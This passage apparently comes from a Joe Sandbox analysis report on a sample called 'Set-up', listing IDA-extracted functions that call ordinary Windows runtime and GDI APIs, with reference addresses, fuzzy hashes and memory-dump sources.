                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$_invalid_parameter_noinfo_noreturnmemcpy
                                                                                          • String ID:
                                                                                          • API String ID: 3533975685-0
                                                                                          • Opcode ID: f8a14b09656c23d0e898b2ca84562ec4352f516c5a70fe2413a2bd27e3f5ae33
                                                                                          • Instruction ID: 7055b8c64baf06e2deeff344477614a797917e6acc7c1ae27b6312e23d2fc173
                                                                                          • Opcode Fuzzy Hash: f8a14b09656c23d0e898b2ca84562ec4352f516c5a70fe2413a2bd27e3f5ae33
                                                                                          • Instruction Fuzzy Hash: 5F511AB3A100149BCB14DF6CCC85ABDB7B5EF94310B18826AE916DB385EB70ED55C7A0
                                                                                          APIs
                                                                                          • memset.VCRUNTIME140 ref: 00A8E1BE
                                                                                          • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,00A8AD4A,?,?), ref: 00A8E1D9
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00A8AD4A,?,?), ref: 00A8E22C
                                                                                          • memset.VCRUNTIME140 ref: 00A8E245
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$_invalid_parameter_noinfo_noreturnmemcpy
                                                                                          • String ID:
                                                                                          • API String ID: 3533975685-0
                                                                                          • Opcode ID: 813baaef719c56af58618b8ae6de0e6c48bc41ea3ff3d57fdec340fb47963a66
                                                                                          • Instruction ID: 9e992794f55060bc07f9ee44497881f7e076d8c1f914e4914a07e7138e653fc2
                                                                                          • Opcode Fuzzy Hash: 813baaef719c56af58618b8ae6de0e6c48bc41ea3ff3d57fdec340fb47963a66
                                                                                          • Instruction Fuzzy Hash: 2441E5B2A001059BDB14EF78DC85ABDB3A9EB54360F544339E92AC3694F730E964C790
                                                                                          APIs
                                                                                          • AlphaBlend.MSIMG32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?), ref: 00A640B0
                                                                                          • SelectObject.GDI32(?,?), ref: 00A640C0
                                                                                          • DeleteObject.GDI32(?), ref: 00A640CB
                                                                                          • DeleteDC.GDI32(?), ref: 00A640D6
                                                                                            • Part of subcall function 00A62540: floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00A62552
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: DeleteObject$AlphaBlendSelectfloor
                                                                                          • String ID:
                                                                                          • API String ID: 2194882061-0
                                                                                          • Opcode ID: 741745d382a0a223a78777ab60400dd3ffc833d667bca47861e8ddc31a215c9c
                                                                                          • Instruction ID: 91ea9179dfe0f917b2525715fe26fa5749de0da38a2c36252d5900de912db467
                                                                                          • Opcode Fuzzy Hash: 741745d382a0a223a78777ab60400dd3ffc833d667bca47861e8ddc31a215c9c
                                                                                          • Instruction Fuzzy Hash: D2519F72A04206EBCB01AF40D9486AF7FB4FF84740F524948F9D5621A5E731C9358F96
                                                                                          APIs
                                                                                          • memcpy.VCRUNTIME140(00000000,?,?,00000001), ref: 00A623EE
                                                                                          • memcpy.VCRUNTIME140(00000000,?,?,00000001), ref: 00A62408
                                                                                          • memcpy.VCRUNTIME140(?,?,00000000), ref: 00A6242B
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A62485
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy$_invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 2665656946-0
                                                                                          • Opcode ID: ed74b8608736d8a38c40a9d5de351f46622401671aa81497a64ab55888d6302c
                                                                                          • Instruction ID: a53ae65bcab8edca852ddd24836c70d7311cb697168f641be82c14d7a8349fb0
                                                                                          • Opcode Fuzzy Hash: ed74b8608736d8a38c40a9d5de351f46622401671aa81497a64ab55888d6302c
                                                                                          • Instruction Fuzzy Hash: 3541C371A00906AFC708DF68CD85A6DB7B5EF44350B148328F926CB395EB34EE55C790
                                                                                          APIs
                                                                                          • GetScrollInfo.USER32(?,00000001,?), ref: 00A71048
                                                                                          • SetScrollInfo.USER32(?,00000001,0000001C,00000001), ref: 00A710A6
                                                                                          • GetScrollInfo.USER32(?,00000000,0000001C), ref: 00A71136
                                                                                          • SetScrollInfo.USER32(?,00000000,0000001C,00000001), ref: 00A71189
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoScroll
                                                                                          • String ID:
                                                                                          • API String ID: 629608716-0
                                                                                          • Opcode ID: f8f94cc85932f63c7ff8da4813df0708989f253b8704cd51bfbbc6ee7e7c428f
                                                                                          • Instruction ID: 48ac2ee09017d54ed2f39e2dce8e0efa2d38736727eb0b7db1d1c2d0289fb8ad
                                                                                          • Opcode Fuzzy Hash: f8f94cc85932f63c7ff8da4813df0708989f253b8704cd51bfbbc6ee7e7c428f
                                                                                          • Instruction Fuzzy Hash: 2E612370900209DFDB20CFA8C848BEEBBF4BF48315F14851DE45AAA284C7B56A94CF91
                                                                                          APIs
                                                                                          • memset.VCRUNTIME140 ref: 00AC5F78
                                                                                          • memcpy.VCRUNTIME140(00000000,?,?,00000000,FFFFFFFF,?,?), ref: 00AC5F92
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,FFFFFFFF,?,?), ref: 00AC5FE5
                                                                                          • memset.VCRUNTIME140 ref: 00AC5FF8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$_invalid_parameter_noinfo_noreturnmemcpy
                                                                                          • String ID:
                                                                                          • API String ID: 3533975685-0
                                                                                          • Opcode ID: 6686b2b44c51bbfc68fb5c1abcbb72ce965e0dbcf7d05e10a119887095b85f7d
                                                                                          • Instruction ID: be8cdd095d037ce3d41bd702a4fd13862c5a332589b8c3786476260cbbe0f2e6
                                                                                          • Opcode Fuzzy Hash: 6686b2b44c51bbfc68fb5c1abcbb72ce965e0dbcf7d05e10a119887095b85f7d
                                                                                          • Instruction Fuzzy Hash: 2F411772A005145BCB18DF7CDC85F7DB798EF84360B19836EF925CB285E630E95486D1
                                                                                          APIs
                                                                                          • memcpy.VCRUNTIME140(00000000,?,?,00A632E3,?,?,75296BA0,00A632E3,?,?), ref: 00A6B345
                                                                                          • memcpy.VCRUNTIME140(00000000,?,?,00A632E3,?,?,75296BA0,00A632E3,?,?), ref: 00A6B35F
                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,?,75296BA0,00A632E3,?,?), ref: 00A6B382
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,75296BA0,00A632E3,?,?), ref: 00A6B3DC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy$_invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 2665656946-0
                                                                                          • Opcode ID: 03fa90e63acd12be4132831613a558fb9419006c53f54aadef42b05608982313
                                                                                          • Instruction ID: 1c68bc13cc89398d8e359823de0d15371812c45bd617a7d9c3d9f415c0178d61
                                                                                          • Opcode Fuzzy Hash: 03fa90e63acd12be4132831613a558fb9419006c53f54aadef42b05608982313
                                                                                          • Instruction Fuzzy Hash: A741C5B1A10505AFC704DF38CD949ADB7B9EF44354B148328E829CB795EB30EE94CBA0
                                                                                          APIs
                                                                                          • memset.VCRUNTIME140 ref: 00A74B41
                                                                                          • memcpy.VCRUNTIME140(00000000,?,?,?), ref: 00A74B5B
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A74BAE
                                                                                          • memset.VCRUNTIME140 ref: 00A74BC0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$_invalid_parameter_noinfo_noreturnmemcpy
                                                                                          • String ID:
                                                                                          • API String ID: 3533975685-0
                                                                                          • Opcode ID: a9a42b05967b53e54325c6ef47b3a6535e4045b9cc7340724da20264335a1a97
                                                                                          • Instruction ID: cd41590b9b5950eaf5fde6dc048af3c402a4e12f5dbaff1f8579ced7228b96a9
                                                                                          • Opcode Fuzzy Hash: a9a42b05967b53e54325c6ef47b3a6535e4045b9cc7340724da20264335a1a97
                                                                                          • Instruction Fuzzy Hash: 6441F8726000149BC718DF7CDC85A7DB7A9EFC8360B18C369E929CB2D9EB30DD548691
                                                                                          APIs
                                                                                          • memset.VCRUNTIME140 ref: 00AD2082
                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 00AD209E
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?), ref: 00AD20EF
                                                                                          • memset.VCRUNTIME140 ref: 00AD2103
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$_invalid_parameter_noinfo_noreturnmemcpy
                                                                                          • String ID:
                                                                                          • API String ID: 3533975685-0
                                                                                          • Opcode ID: 512d62dbf295bbe0e18b55b511b78f78f93be6ad8852734fdd479b94762556d4
                                                                                          • Instruction ID: 310146285e5807aaa31bd5ef7fae1427b765f1dd1c50f23814fa4bb825333312
                                                                                          • Opcode Fuzzy Hash: 512d62dbf295bbe0e18b55b511b78f78f93be6ad8852734fdd479b94762556d4
                                                                                          • Instruction Fuzzy Hash: 3B41D772A000049BCB14DF7CDD85A7DB7A9EF94310B28837AE91ACB385EA31DD45C7A1
                                                                                          APIs
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000004,00000000,00000000,?,00A7BFF5,00A7C530,?,00A7C530), ref: 00A7CADD
                                                                                          • memset.VCRUNTIME140 ref: 00A7CB04
                                                                                          • memcpy.VCRUNTIME140(00000000,?,?,00000000,00000004,00000000,00000000,?,00A7BFF5,00A7C530,?,00A7C530), ref: 00A7CB21
                                                                                          • memset.VCRUNTIME140 ref: 00A7CB4B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$_invalid_parameter_noinfo_noreturnmemcpy
                                                                                          • String ID:
                                                                                          • API String ID: 3533975685-0
                                                                                          • Opcode ID: b236b5db22b2fcd45ca2e9720bf0de0d58c298a24bc972247de6731d48f5a39a
                                                                                          • Instruction ID: 465c88a6873a3e0552345e7c3292910424a0ee3b2fd5f33f40b4bd9b4d604885
                                                                                          • Opcode Fuzzy Hash: b236b5db22b2fcd45ca2e9720bf0de0d58c298a24bc972247de6731d48f5a39a
                                                                                          • Instruction Fuzzy Hash: 8931D6B2A00119ABC714DFBD9D8197EB7A9EB84371B10C37EE929D3294EA709D148690
                                                                                          APIs
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?), ref: 00A7C99A
                                                                                          • memset.VCRUNTIME140 ref: 00A7C9C1
                                                                                          • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 00A7C9E1
                                                                                          • memset.VCRUNTIME140 ref: 00A7CA0B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$_invalid_parameter_noinfo_noreturnmemcpy
                                                                                          • String ID:
                                                                                          • API String ID: 3533975685-0
                                                                                          • Opcode ID: 22c27a23c8ba2807061d0ffd62afd544aa32c505b00337596845bf901b027610
                                                                                          • Instruction ID: 1aac7f02be985c986b5a29edb5149ca551eea6c86bfbaa279e2ba9df4b1c609c
                                                                                          • Opcode Fuzzy Hash: 22c27a23c8ba2807061d0ffd62afd544aa32c505b00337596845bf901b027610
                                                                                          • Instruction Fuzzy Hash: 7C310872B00114ABC700EF7CDC85A6EB7A9EBC4761B14C279E92DDB385E930DD1483A0
                                                                                          APIs
                                                                                          • AlphaBlend.MSIMG32(?,?,?,00000000,?,?,00000000,00000000,00000000,?), ref: 00A63BA6
                                                                                          • SelectObject.GDI32(?,?), ref: 00A63BC0
                                                                                          • DeleteObject.GDI32(?), ref: 00A63BCB
                                                                                          • DeleteDC.GDI32(?), ref: 00A63BD6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: DeleteObject$AlphaBlendSelect
                                                                                          • String ID:
                                                                                          • API String ID: 2776048027-0
                                                                                          • Opcode ID: 976b4eafe7c7c3a52f888c6ec1a5c2e4b5b5ac145b313b3019baaf444756adb8
                                                                                          • Instruction ID: 387489a40ea61550265fd77d041a30320f2fe9d9d188e7ba83d6feca4bee095c
                                                                                          • Opcode Fuzzy Hash: 976b4eafe7c7c3a52f888c6ec1a5c2e4b5b5ac145b313b3019baaf444756adb8
                                                                                          • Instruction Fuzzy Hash: FD4102712097029FC724CF18C984A6AFBF9FF88704F04491DF99697211D732EA1ACB92
                                                                                          APIs
                                                                                          • SelectObject.GDI32(?,?), ref: 00A6426C
                                                                                          • SelectObject.GDI32(?,?), ref: 00A64274
                                                                                          • ExtTextOutW.GDI32(?,?,00000000,?,?,?,00000000,00000000), ref: 00A642F8
                                                                                          • ExtTextOutA.GDI32(?,?,00000000,?,?,?,?,00000000), ref: 00A64340
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: ObjectSelectText
                                                                                          • String ID:
                                                                                          • API String ID: 3628355225-0
                                                                                          • Opcode ID: 77c45f5ad9820e85a53dcd24267afcbae817972d6a08d83f3ede91157ee0e3f1
                                                                                          • Instruction ID: 2b989d1f0016a6f69fddbff7692926858ef14a8e496cae2848cd8edb9ee3851a
                                                                                          • Opcode Fuzzy Hash: 77c45f5ad9820e85a53dcd24267afcbae817972d6a08d83f3ede91157ee0e3f1
                                                                                          • Instruction Fuzzy Hash: A731377590020EABCF119FA4DC45AFEBBB5EF08310F1141A5FA09A7211DB359998CFA0
                                                                                          APIs
                                                                                          • SelectObject.GDI32(?,?), ref: 00A64511
                                                                                          • SelectObject.GDI32(?,?), ref: 00A64519
                                                                                          • GetTextExtentPoint32A.GDI32(?,?,?,00000000), ref: 00A64551
                                                                                          • GetTextExtentPoint32W.GDI32(?,?,?,00000000), ref: 00A64582
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
